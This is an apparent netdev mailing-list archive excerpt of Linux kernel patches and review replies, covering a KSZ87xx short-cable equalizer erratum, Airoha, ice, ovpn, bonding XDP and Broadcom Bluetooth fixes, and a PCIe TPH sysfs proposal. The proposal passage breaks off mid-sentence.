* [PATCH v3 1/3] net: dsa: microchip: implement KSZ87xx Module 3 low-loss cable errata
From: Fidelio Lawson @ 2026-04-14 9:12 UTC (permalink / raw)
To: Woojung Huh, UNGLinuxDriver, Andrew Lunn, Vladimir Oltean,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Marek Vasut, Maxime Chevallier, Simon Horman, Heiner Kallweit,
Russell King
Cc: Woojung Huh, netdev, linux-kernel, Fidelio Lawson
In-Reply-To: <20260414-ksz87xx_errata_low_loss_connections-v3-0-0e3838ca98c9@exotec.com>
Implement the "Module 3: Equalizer fix for short cables" erratum from
Microchip document DS80000687C for KSZ87xx switches.
The issue affects short or low-loss cable links (e.g. CAT5e/CAT6),
where the PHY receiver equalizer may amplify high-amplitude signals
excessively, resulting in internal distortion and link establishment
failures.
KSZ87xx devices require a workaround for the Module 3 low-loss cable
condition, controlled through the switch TABLE_LINK_MD_V indirect
registers.
The affected registers are part of the switch address space and are not
directly accessible from the PHY driver. To keep the PHY-facing API
clean and avoid leaking switch-specific details, model this errata
control as vendor-specific Clause 22 PHY registers.
A vendor-specific Clause 22 PHY register is introduced as a mode
selector in PHY_REG_LOW_LOSS_CTRL, and ksz8_r_phy() / ksz8_w_phy()
translate accesses to these bits into the appropriate indirect
TABLE_LINK_MD_V accesses.
The control register defines the following modes:
0: disabled (default behavior)
1: EQ training workaround
2: LPF 90 MHz
3: LPF 62 MHz
4: LPF 55 MHz
5: LPF 44 MHz
Workaround 1: Adjusts the DSP EQ training behavior via LinkMD register
0x3C. Widens and optimizes the DSP EQ compensation range,
and is expected to solve most short/low-loss cable issues.
Workaround 2: for the cases where Workaround 1 is not sufficient.
This one adjusts the receiver low-pass filter bandwidth, effectively
reducing the high-frequency component of the received signal
The register is accessible through standard PHY read/write operations
(e.g. phytool), without requiring any switch-specific userspace
interface. This allows robust link establishment on short or
low-loss cabling without requiring DTS properties and without
constraining hardware design choices.
The erratum affects the shared PHY analog front-end and therefore
applies globally to the switch.
Signed-off-by: Fidelio Lawson <fidelio.lawson@exotec.com>
---
drivers/net/dsa/microchip/ksz8.c | 45 ++++++++++++++++++++++++++++++++++
drivers/net/dsa/microchip/ksz8_reg.h | 36 ++++++++++++++++++++++++++-
drivers/net/dsa/microchip/ksz_common.h | 3 +++
3 files changed, 83 insertions(+), 1 deletion(-)
diff --git a/drivers/net/dsa/microchip/ksz8.c b/drivers/net/dsa/microchip/ksz8.c
index c354abdafc1b..596c85654f24 100644
--- a/drivers/net/dsa/microchip/ksz8.c
+++ b/drivers/net/dsa/microchip/ksz8.c
@@ -1058,6 +1058,11 @@ int ksz8_r_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 *val)
if (ret)
return ret;
+ break;
+ case PHY_REG_KSZ87XX_LOW_LOSS:
+ if (!ksz_is_ksz87xx(dev))
+ return -EOPNOTSUPP;
+ data = dev->low_loss_wa_mode;
break;
default:
processed = false;
@@ -1271,6 +1276,46 @@ int ksz8_w_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 val)
if (ret)
return ret;
break;
+ case PHY_REG_KSZ87XX_LOW_LOSS:
+ if (!ksz_is_ksz87xx(dev))
+ return -EOPNOTSUPP;
+
+ switch (val & PHY_KSZ87XX_LOW_LOSS_MASK) {
+ case PHY_LOW_LOSS_ERRATA_DISABLED:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_EQ_TRAIN,
+ KSZ87XX_EQ_TRAIN_DEFAULT);
+ if (!ret)
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD,
+ KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_LOW_LOSS_LPF_90MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_EQ_TRAIN:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_EQ_TRAIN,
+ KSZ87XX_EQ_TRAIN_LOW_LOSS);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_90MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_90MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_62MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_62MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_55MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_55MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_44MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_44MHZ);
+ break;
+ default:
+ return -EINVAL;
+ }
+
+ if (!ret)
+ dev->low_loss_wa_mode = val & PHY_KSZ87XX_LOW_LOSS_MASK;
+ return ret;
default:
break;
}
diff --git a/drivers/net/dsa/microchip/ksz8_reg.h b/drivers/net/dsa/microchip/ksz8_reg.h
index 332408567b47..4e02e044339c 100644
--- a/drivers/net/dsa/microchip/ksz8_reg.h
+++ b/drivers/net/dsa/microchip/ksz8_reg.h
@@ -202,6 +202,10 @@
#define REG_PORT_3_STATUS_0 0x38
#define REG_PORT_4_STATUS_0 0x48
+/* KSZ87xx LinkMD registers (TABLE_LINK_MD_V) */
+#define KSZ87XX_REG_EQ_TRAIN 0x3C
+#define KSZ87XX_REG_PHY_LPF 0x4C
+
/* For KSZ8765. */
#define PORT_REMOTE_ASYM_PAUSE BIT(5)
#define PORT_REMOTE_SYM_PAUSE BIT(4)
@@ -342,7 +346,7 @@
#define TABLE_EEE (TABLE_EEE_V << TABLE_EXT_SELECT_S)
#define TABLE_ACL (TABLE_ACL_V << TABLE_EXT_SELECT_S)
#define TABLE_PME (TABLE_PME_V << TABLE_EXT_SELECT_S)
-#define TABLE_LINK_MD (TABLE_LINK_MD << TABLE_EXT_SELECT_S)
+#define TABLE_LINK_MD (TABLE_LINK_MD_V << TABLE_EXT_SELECT_S)
#define TABLE_READ BIT(4)
#define TABLE_SELECT_S 2
#define TABLE_STATIC_MAC_V 0
@@ -729,6 +733,36 @@
#define PHY_POWER_SAVING_ENABLE BIT(2)
#define PHY_REMOTE_LOOPBACK BIT(1)
+/* Equalizer low-loss workaround */
+#define PHY_REG_KSZ87XX_LOW_LOSS 0x1C
+#define PHY_KSZ87XX_LOW_LOSS_MASK GENMASK(2, 0)
+
+/* KSZ87xx low-loss EQ mode selector (vendor-specific PHY reg 0x1c)
+ *
+ * Values:
+ * 0: disabled (default behavior)
+ * 1: EQ training workaround
+ * 2: LPF 90 MHz
+ * 3: LPF 62 MHz
+ * 4: LPF 55 MHz
+ * 5: LPF 44 MHz
+ */
+#define PHY_LOW_LOSS_ERRATA_DISABLED 0
+#define KSZ87XX_LOW_LOSS_EQ_TRAIN 1
+#define KSZ87XX_LOW_LOSS_LPF_90MHZ 2
+#define KSZ87XX_LOW_LOSS_LPF_62MHZ 3
+#define KSZ87XX_LOW_LOSS_LPF_55MHZ 4
+#define KSZ87XX_LOW_LOSS_LPF_44MHZ 5
+
+#define KSZ87XX_EQ_TRAIN_DEFAULT 0x0A
+#define KSZ87XX_EQ_TRAIN_LOW_LOSS 0x15
+
+/* LPF bandwidth bits [7:6]: 00 = 90MHz, 01 = 62MHz, 10 = 55MHz, 11 = 44MHz */
+#define KSZ87XX_PHY_LPF_90MHZ 0x00
+#define KSZ87XX_PHY_LPF_62MHZ 0x40
+#define KSZ87XX_PHY_LPF_55MHZ 0x80
+#define KSZ87XX_PHY_LPF_44MHZ 0xC0
+
/* KSZ8463 specific registers. */
#define P1MBCR 0x4C
#define P1MBSR 0x4E
diff --git a/drivers/net/dsa/microchip/ksz_common.h b/drivers/net/dsa/microchip/ksz_common.h
index 929aff4c55de..16a6074ea4b4 100644
--- a/drivers/net/dsa/microchip/ksz_common.h
+++ b/drivers/net/dsa/microchip/ksz_common.h
@@ -219,6 +219,9 @@ struct ksz_device {
* the switch’s internal PHYs, bypassing the main SPI interface.
*/
struct mii_bus *parent_mdio_bus;
+
+ /* Equalizer low-loss workaround tunable */
+ u8 low_loss_wa_mode; /* KSZ87xx low-loss EQ/LPF mode selector (0-5) */
};
/* List of supported models */
--
2.53.0
^ permalink raw reply related
* [PATCH v3 0/3] ksz87xx: add support for low-loss cable equalizer errata
From: Fidelio Lawson @ 2026-04-14 9:12 UTC (permalink / raw)
To: Woojung Huh, UNGLinuxDriver, Andrew Lunn, Vladimir Oltean,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Marek Vasut, Maxime Chevallier, Simon Horman, Heiner Kallweit,
Russell King
Cc: Woojung Huh, netdev, linux-kernel, Fidelio Lawson
Hello,
This patch implements the “Module 3: Equalizer fix for short cables” erratum
described in Microchip document DS80000687C for KSZ87xx switches.
According to the erratum, the embedded PHY receiver in KSZ87xx switches is
tuned by default for long, high-loss Ethernet cables. When operating with
short or low-loss cables (for example CAT5e or CAT6), the PHY equalizer may
over-amplify the incoming signal, leading to internal distortion and link
establishment failures.
Microchip provides two workarounds, each requiring a write to a different
indirect PHY register access mechanism.
The workaround requires programming internal PHY/DSP registers located in the
LinkMD table, accessed through the KSZ8 indirect register mechanism. Since these
registers belong to the switch address space and are not directly accessible
from a standalone PHY driver, the erratum control is modeled as a vendor-specific
Clause 22 PHY register, virtualized by the KSZ8 DSA driver.
Reads and writes to this register are intercepted by ksz8_r_phy() /
ksz8_w_phy() and translated into the required TABLE_LINK_MD_V indirect accesses.
The erratum affects the shared PHY analog front-end and therefore applies
globally to the switch.
The control register defines the following modes:
0: disabled (default behavior)
1: EQ training workaround
2: LPF 90 MHz
3: LPF 62 MHz
4: LPF 55 MHz
5: LPF 44 MHz
The register can be read and written from userspace via a phy tunable.
Note that current ethtool userspace only supports a fixed set of PHY tunables;
vendor-specific tunables may require either phytool or a newer userspace extension.
This series is based on Linux v7.0-rc1.
Signed-off-by: Fidelio Lawson <fidelio.lawson@exotec.com>
---
Changes in v3:
- Exposed all LPF bandwidth values supported by the hardware.
- Added phy tunable.
- Link to v2: https://patch.msgid.link/20260408-ksz87xx_errata_low_loss_connections-v2-1-9cfe38691713@exotec.com
Changes in v2:
- Dropped the device tree approach based on review feedback
- Modeled the errata control as a vendor-specific Clause 22 PHY register
- Added KSZ87xx-specific guards and replaced magic values with named macros
- Rebased on Linux v7.0-rc1
- Link to v1: https://patch.msgid.link/20260326-ksz87xx_errata_low_loss_connections-v1-0-79a698f43626@exotec.com
---
Fidelio Lawson (3):
net: dsa: microchip: implement KSZ87xx Module 3 low-loss cable errata
net: ethtool: add KSZ87xx low-loss PHY tunable
net: phy: micrel: expose KSZ87xx low-loss erratum via PHY tunable
drivers/net/dsa/microchip/ksz8.c | 45 ++++++++++++++++++++++++++++++++++
drivers/net/dsa/microchip/ksz8_reg.h | 36 ++++++++++++++++++++++++++-
drivers/net/dsa/microchip/ksz_common.h | 3 +++
drivers/net/phy/micrel.c | 39 +++++++++++++++++++++++++++++
include/uapi/linux/ethtool.h | 1 +
net/ethtool/common.c | 1 +
net/ethtool/ioctl.c | 1 +
7 files changed, 125 insertions(+), 1 deletion(-)
---
base-commit: 2d1373e4246da3b58e1df058374ed6b101804e07
change-id: 20260323-ksz87xx_errata_low_loss_connections-b65e76e2b403
Best regards,
--
Fidelio Lawson <fidelio.lawson@exotec.com>
^ permalink raw reply
* Re: [PATCH net-next v11 05/10] bng_en: add support for link async events
From: Bhargava Chenna Marreddy @ 2026-04-14 9:11 UTC (permalink / raw)
To: Vadim Fedorenko
Cc: davem, edumazet, kuba, pabeni, andrew+netdev, horms, netdev,
linux-kernel, michael.chan, pavan.chebbi, vsrama-krishna.nemani,
vikas.gupta, Rajashekar Hudumula, Ajit Kumar Khaparde
In-Reply-To: <3596a43d-8c8e-47ac-ae73-ee282f3be945@linux.dev>
[-- Attachment #1: Type: text/plain, Size: 511 bytes --]
On Wed, Apr 8, 2026 at 6:22 PM Vadim Fedorenko
<vadim.fedorenko@linux.dev> wrote:
> > @@ -190,6 +199,14 @@ int bnge_hwrm_func_drv_rgtr(struct bnge_dev *bd)
> > req->ver_min = cpu_to_le16(DRV_VER_MIN);
> > req->ver_upd = cpu_to_le16(DRV_VER_UPD);
> >
> > + memset(async_events_bmap, 0, sizeof(async_events_bmap));
>
> bitmap API has bitmap_zero()
Thanks, Vadim.
Since the subsequent version is already merged, I've noted this for a
future update.
Thanks,
Bhargava Marreddy.
[-- Attachment #2: S/MIME Cryptographic Signature --]
[-- Type: application/pkcs7-signature, Size: 5496 bytes --]
^ permalink raw reply
* Re: [PATCH net-next v2 2/2] selftests/bpf: verify syncookie statistics in tcp_custom_syncookie
From: Paolo Abeni @ 2026-04-14 9:08 UTC (permalink / raw)
To: Kuniyuki Iwashima, Jiayuan Chen
Cc: netdev, Eric Dumazet, Neal Cardwell, David S. Miller,
Jakub Kicinski, Simon Horman, David Ahern, Alexei Starovoitov,
Daniel Borkmann, Andrii Nakryiko, Martin KaFai Lau,
Eduard Zingerman, Song Liu, Yonghong Song, John Fastabend,
KP Singh, Stanislav Fomichev, Hao Luo, Jiri Olsa, Shuah Khan,
linux-kernel, bpf, linux-kselftest
In-Reply-To: <CAAVpQUCCZVogDUUTfr3k-JxV52kpVvdYzqFC68-J3n6_ugd4Uw@mail.gmail.com>
On 4/14/26 7:50 AM, Kuniyuki Iwashima wrote:
> On Fri, Apr 10, 2026 at 6:32 PM Jiayuan Chen <jiayuan.chen@linux.dev> wrote:
>>
>> Add read_tcpext_snmp() helper to network_helpers which reads a
>> TcpExt SNMP counter via nstat, and use it in the tcp_custom_syncookie
>> test to verify that LINUX_MIB_SYNCOOKIESRECV is incremented and
>> LINUX_MIB_SYNCOOKIESFAILED stays unchanged across a successful
>> BPF custom syncookie validation.
>>
>> The delta is captured between start_server() and accept(), which
>> covers the full SYN/ACK/cookie-check path for one connection.
>>
>> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
>> ---
>> tools/testing/selftests/bpf/network_helpers.c | 22 +++++++++++++++++++
>> tools/testing/selftests/bpf/network_helpers.h | 1 +
>> .../bpf/prog_tests/tcp_custom_syncookie.c | 20 +++++++++++++++++
>
> As you touch bpf selftest helper files, please rebase on bpf-next
> to avoid possible conflicts and tag bpf-next in the Subject.
To hopefully minimize the conflicts handling I'm going to apply patch
1/2 to net-next. Please resubmit patch 2/2 to bpf-next after the
relevant net core reach there.
/P
^ permalink raw reply
* Re: [PATCH iwl-next 2/10] ice: allow setting advertised speed and duplex for all media types
From: Simon Horman @ 2026-04-14 9:04 UTC (permalink / raw)
To: aleksandr.loktionov
Cc: 'Simon Horman', intel-wired-lan, anthony.l.nguyen, netdev,
jacob.e.keller
In-Reply-To: <20260410074921.1254213-3-aleksandr.loktionov@intel.com>
From: 'Simon Horman' <horms@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
---
ice: allow setting advertised speed and duplex for all media types
This commit allows setting advertised speed and duplex for all media types by
only refusing media types NONE or UNKNOWN in strict mode. It adds AUI and NONE
to the ice_media_type enum.
> diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
> index e6a20af6f63de..62d214c5582ad 100644
> --- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
> +++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
> @@ -2634,10 +2635,14 @@ ice_set_link_ksettings(struct net_device *netdev,
> if (!pi)
> return -EIO;
>
> - if (pi->phy.media_type != ICE_MEDIA_BASET &&
> - pi->phy.media_type != ICE_MEDIA_FIBER &&
> - pi->phy.media_type != ICE_MEDIA_BACKPLANE &&
> - pi->phy.media_type != ICE_MEDIA_DA &&
> + lenient_mode = test_bit(ICE_FLAG_LINK_LENIENT_MODE_ENA, pf->flags);
> +
> + /* Setting the speed and duplex advertised by autonegotiation is
> + * supported for all media types, so only return unsupported for media
> + * type none or unknown in strict mode.
> + */
> + if ((pi->phy.media_type == ICE_MEDIA_NONE ||
> + (pi->phy.media_type == ICE_MEDIA_UNKNOWN && !lenient_mode)) &&
> pi->phy.link_info.link_info & ICE_AQ_LINK_UP)
> return -EOPNOTSUPP;
Will AUI media types still be rejected here in strict mode?
The patch adds ICE_MEDIA_AUI and ICE_MEDIA_NONE to enum ice_media_type, but
doesn't appear to update ice_get_media_type() to actually return these new
values.
If AUI media continues to fall through to ICE_MEDIA_UNKNOWN, wouldn't the new
logic still reject it when lenient mode is disabled, defeating the intent of
the patch?
[ ... ]
> @@ -2667,7 +2672,7 @@ ice_set_link_ksettings(struct net_device *netdev,
> if (!bitmap_subset(copy_ks.link_modes.advertising,
> safe_ks.link_modes.supported,
> __ETHTOOL_LINK_MODE_MASK_NBITS)) {
> - if (!test_bit(ICE_FLAG_LINK_LENIENT_MODE_ENA, pf->flags))
> + if (!lenient_mode)
> netdev_info(netdev, "The selected speed is not supported by the current media. Please select a link speed that is supported by the current media.\n");
> err = -EOPNOTSUPP;
> goto done;
This isn't a bug introduced by this patch, but does taking this error path
accidentally release another thread's lock?
The ICE_CFG_BUSY flag is used as an ad-hoc lock later in this function:
while (test_and_set_bit(ICE_CFG_BUSY, pf->state)) {
timeout--;
if (!timeout) {
err = -EBUSY;
goto done;
}
usleep_range(TEST_SET_BITS_SLEEP_MIN, TEST_SET_BITS_SLEEP_MAX);
}
If the bitmap_subset() check fails, or if the while loop times out, it jumps to
the done label:
done:
kfree(phy_caps);
clear_bit(ICE_CFG_BUSY, pf->state);
Since the bitmap_subset() check happens before test_and_set_bit() has acquired
the lock, wouldn't this unconditionally clear the ICE_CFG_BUSY flag even if
another thread currently holds it? Could this synchronization be replaced with a
standard lock to avoid these issues?
^ permalink raw reply
* Re: [PATCH net-next 5/5] selftests: ovpn: align command flow with TAP
From: Antonio Quartulli @ 2026-04-14 9:02 UTC (permalink / raw)
To: Jakub Kicinski; +Cc: netdev, ralf, sd, pabeni, andrew+netdev, davem, edumazet
In-Reply-To: <20260413235608.3699773-2-kuba@kernel.org>
Hi,
On 14/04/2026 01:56, Jakub Kicinski wrote:
> This is an AI-generated review of your patch. The human sending this
> email says: "The second one looks legit, would you prefer to follow
> up or respin?"
Will respin, since we also have to fix the timeout in 2/5.
Thanks,
--
Antonio Quartulli
OpenVPN Inc.
^ permalink raw reply
* Re: [PATCH net-next 2/5] selftests: ovpn: fail notification check on mismatch
From: Antonio Quartulli @ 2026-04-14 9:01 UTC (permalink / raw)
To: Jakub Kicinski
Cc: netdev, ralf, Sabrina Dubroca, Paolo Abeni, Andrew Lunn,
David S. Miller, Eric Dumazet
In-Reply-To: <20260413170014.12316e9b@kernel.org>
Hi,
On 14/04/2026 02:00, Jakub Kicinski wrote:
> On Mon, 13 Apr 2026 00:11:18 +0200 Antonio Quartulli wrote:
>> compare_ntfs doesn't fail when expected and received notification
>> streams diverge.
>>
>> Fix this bug by trackink the diff exit status explicitly and return it
>> to the caller so notification mismatches propagate as test failures.
>
> Hm, this series nicely cleans up test_mark.sh failures
> but test_tcp.sh now always fails on debug (slow) kernel
> builds with:
>
> # TAP version 13
> # 1..12
> # ok 1 setup network topology
> # ok 2 run baseline data traffic
> # ok 3 run LAN traffic behind peer1
> # ok 4 run iperf throughput
> # ok 5 run key rollout
> # ok 6 query peers
> # ok 7 query missing peer fails
> # ok 8 peer lifecycle and key queries
> # ok 9 delete peer while traffic
> # ok 10 delete stale keys
> # ok 11 check timeout behavior
> # Checking notifications for peer 3... failed
> # 1,9d0
> # < {
> # < "name": "peer-del-ntf",
> # < "msg": {
> # < "peer": {
> # < "del-reason": "expired",
> # < "id": 12
> # < }
> # < }
> # < }
> # validate listener output for peer 3: command failed with rc=1: ovpn_compare_ntfs 3
> # not ok 12 validate notification output
> # # Totals: pass:11 fail:1 xfail:0 xpass:0 skip:0 error:0
>
> Similar failure in test_symmetric_id_tcp.sh
>
> Only the debug kernels tho, non-debug kernels seem to pass.
> So probably some race / slowness.
We have to extend the internal timeout a bit, because it triggers before
the notification is delivered.
Will get this fixed.
Thanks,
--
Antonio Quartulli
OpenVPN Inc.
^ permalink raw reply
* Re: [PATCH net v7 0/2] net,bpf: fix null-ptr-deref in xdp_master_redirect() for bonding and add selftest
From: patchwork-bot+netdevbpf @ 2026-04-14 9:00 UTC (permalink / raw)
To: Jiayuan Chen
Cc: netdev, jiayuan.chen, ast, daniel, andrii, martin.lau, eddyz87,
song, yonghong.song, john.fastabend, kpsingh, sdf, haoluo, jolsa,
davem, edumazet, kuba, pabeni, horms, hawk, shuah, joamaki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-1-jiayuan.chen@linux.dev>
Hello:
This series was applied to netdev/net.git (main)
by Paolo Abeni <pabeni@redhat.com>:
On Sat, 11 Apr 2026 08:55:18 +0800 you wrote:
> From: Jiayuan Chen <jiayuan.chen@shopee.com>
>
> This series has gone through several rounds of discussion and the
> maintainers hold different views on where the fix should live (in the
> generic xdp_master_redirect() path vs. inside bonding). I respect all
> of the suggestions, but I would like to get the crash fixed first, so
> this version takes the approach of checking whether the master device
> is up in xdp_master_redirect(), as suggested by Daniel Borkmann. If a
> different shape is preferred later it can be done as a follow-up, but
> the null-ptr-deref should not linger.
>
> [...]
Here is the summary with links:
- [net,v7,1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
https://git.kernel.org/netdev/net/c/1921f91298d1
- [net,v7,2/2] selftests/bpf: add test for xdp_master_redirect with bond not up
https://git.kernel.org/netdev/net/c/8dd1bdde38af
You are awesome, thank you!
--
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html
^ permalink raw reply
* Re: [PATCH v2] Bluetooth: Add Broadcom channel priority commands
From: Neal Gompa @ 2026-04-14 8:59 UTC (permalink / raw)
To: fnkl.kernel
Cc: Sven Peter, Janne Grunau, Marcel Holtmann, Luiz Augusto von Dentz,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Simon Horman, linux-kernel, asahi, linux-arm-kernel,
linux-bluetooth, netdev
In-Reply-To: <20260407-brcm-prio-v2-1-3f745edf49af@gmail.com>
On Tue, Apr 7, 2026 at 1:46 PM Sasha Finkelstein via B4 Relay
<devnull+fnkl.kernel.gmail.com@kernel.org> wrote:
>
> From: Sasha Finkelstein <fnkl.kernel@gmail.com>
>
> Certain Broadcom bluetooth chips (bcm4377/bcm4378/bcm438) need ACL
> streams carrying audio to be set as "high priority" using a vendor
> specific command to prevent 10-ish second-long dropouts whenever
> something does a device scan. This patch sends the command when the
> socket priority is set to TC_PRIO_INTERACTIVE, as BlueZ does for audio.
>
> Signed-off-by: Sasha Finkelstein <fnkl.kernel@gmail.com>
> ---
> Changes in v2:
> - new ioctl got nack-ed, so let's use sk_priority as the trigger
> - Link to v1: https://lore.kernel.org/r/20260407-brcm-prio-v1-1-f38b17376640@gmail.com
> ---
Thank you so much for this!
Reviewed-by: Neal Gompa <neal@gompa.dev>
--
真実はいつも一つ!/ Always, there's only one truth!
^ permalink raw reply
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Lorenzo Bianconi @ 2026-04-14 8:57 UTC (permalink / raw)
To: Paolo Abeni
Cc: edumazet, kuba, davem, netdev, andrew+netdev, linux-arm-kernel,
linux-mediatek
In-Reply-To: <20260414082949.104611-1-pabeni@redhat.com>
[-- Attachment #1: Type: text/plain, Size: 3065 bytes --]
> This is an AI-generated review of your patch. The human sending this
> email has considered the AI review valid, or at least plausible.
>
> For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
> ---
> net: airoha: Wait for TX to complete in airoha_dev_stop()
>
> Wait for TX to complete in airoha_dev_stop routine before stopping the
> TX DMA and run airoha_qdma_cleanup_tx_queue routine. Moreover,
> start/stop TX/RX NAPIs in ndo_open()/ndo_stop() callbacks in order to be
> sure the TX NAPIs have completed before stopping the TX DMA engine in
> airoha_dev_stop routine.
>
> > diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> > index 8e4b043af4bc..9e40c8f375c1 100644
> > --- a/drivers/net/ethernet/airoha/airoha_eth.c
> > +++ b/drivers/net/ethernet/airoha/airoha_eth.c
>
> [ ... ]
>
> > @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> > struct airoha_qdma *qdma = port->qdma;
> > int i, err;
> >
> > - netif_tx_disable(dev);
> > err = airoha_set_vip_for_gdm_port(port, false);
> > if (err)
> > return err;
> >
> > - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> > - netdev_tx_reset_subqueue(dev, i);
> > -
> > airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> > FE_PSE_PORT_DROP);
> >
> > + netif_tx_disable(dev);
> > if (atomic_dec_and_test(&qdma->users)) {
> > + u32 val;
> > +
> > + /* Wait for TX to complete */
> > + err = read_poll_timeout(airoha_qdma_rr, val,
> > + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> > + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> > + false, qdma, REG_QDMA_GLOBAL_CFG);
> > + if (err)
> > + return err;
> > ^^^^^^^^^^
>
> Can this leave the device in an inconsistent state? When read_poll_timeout()
> fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
> immediately. However, atomic_dec_and_test(&qdma->users) has already
> decremented qdma->users to 0, but airoha_qdma_stop_napi() was never called,
> so all NAPIs remain enabled.
>
> The networking core (__dev_close_many in net/core/dev.c) ignores the
> ndo_stop return value and marks the device as down regardless. When the
> device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
> return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
> which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
> because the NAPI was never disabled.
>
> The early return also skips the netdev_tx_reset_subqueue() calls at the end
> of the function.
>
> Should the code either continue with cleanup on timeout (don't return), or
> ensure NAPI and DMA state are properly cleaned up before returning?
ack, I will fix it in v2.
Regards,
Lorenzo
>
> > +
> > + airoha_qdma_stop_napi(qdma);
> > airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> > GLOBAL_CFG_TX_DMA_EN_MASK |
> > GLOBAL_CFG_RX_DMA_EN_MASK);
>
> [ ... ]
>
[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 228 bytes --]
^ permalink raw reply
* Re: [RFC] Proposal: Add sysfs interface for PCIe TPH Steering Tag retrieval and configuration
From: Leon Romanovsky @ 2026-04-14 8:57 UTC (permalink / raw)
To: fengchengwen
Cc: Jason Gunthorpe, Bjorn Helgaas, linux-rdma, linux-pci, netdev,
dri-devel, Keith Busch, Yochai Cohen, Yishai Hadas, Zhiping Zhang
In-Reply-To: <b95ced54-339f-4859-b3eb-8bf261393ffc@huawei.com>
On Tue, Apr 14, 2026 at 09:07:23AM +0800, fengchengwen wrote:
> On 4/14/2026 3:19 AM, Leon Romanovsky wrote:
> > On Mon, Apr 13, 2026 at 08:04:10PM +0800, fengchengwen wrote:
> >> On 4/13/2026 6:01 PM, Leon Romanovsky wrote:
> >>> On Fri, Apr 10, 2026 at 10:30:52PM +0800, fengchengwen wrote:
> >>>> Hi all,
> >>>>
> >>>> I'm writing to propose adding a sysfs interface to expose and configure the
> >>>> PCIe TPH
> >>>> Steering Tag for PCIe devices, which is retrieved inside the kernel.
> >>>>
> >>>>
> >>>> Background: The TPH Steering Tag is tightly coupled with both a PCIe device
> >>>> (identified
> >>>> by its BDF) and a CPU core. It can only be obtained in kernel mode. To allow
> >>>> user-space
> >>>> applications to fetch and set this value securely and conveniently, we need
> >>>> a standard
> >>>> kernel-to-user interface.
> >>>>
> >>>>
> >>>> Proposed Solution: Add several sysfs attributes under each PCIe device's
> >>>> sysfs directory:
> >>>> 1. /sys/bus/pci/devices/<BDF>/tph_mode to query the TPH mode (interrupt or
> >>>> device specific)
> >>>> 2. /sys/bus/pci/devices/<BDF>/tph_enable to control the TPH feature
> >>>> 3. /sys/bus/pci/devices/<BDF>/tph_st to support both read and write
> >>>> operations, e.g.:
> >>>> Read operation:
> >>>> echo "cpu=3" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> cat /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> Write operation:
> >>>> echo "index=10 st=123" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>>
> >>>>
> >>>> The design strictly follows PCI subsystem sysfs standards and has the
> >>>> following key properties:
> >>>>
> >>>> 1. Dynamic Visibility: The sysfs attributes will only be present for PCIe
> >>>> devices that
> >>>> support TPH Steering Tag. Devices without TPH capability will not show
> >>>> these nodes,
> >>>> avoiding unnecessary user confusion.
> >>>>
> >>>> 2. Permission Control: The attributes will use 0600 file permissions,
> >>>> ensuring only
> >>>> privileged root users can read or write them, which satisfies security
> >>>> requirements
> >>>> for hardware configuration interfaces.
> >>>>
> >>>> 3. Standard Implementation Location: The interface will be implemented in
> >>>> drivers/pci/pci-sysfs.c, the canonical location for all PCI device sysfs
> >>>> attributes,
> >>>> ensuring consistency and maintainability within the PCI subsystem.
> >>>>
> >>>>
> >>>> Why sysfs instead of alternatives like VFIO-PCI ioctl:
> >>>>
> >>>> - Universality: sysfs does not require binding the device to a special
> >>>> driver such as
> >>>> vfio-pci. It is available to any privileged user-space component,
> >>>> including system
> >>>> utilities, daemons, and monitoring tools.
> >>>>
> >>>> - Simplicity: Both user-space usage (cat/echo) and kernel implementation are
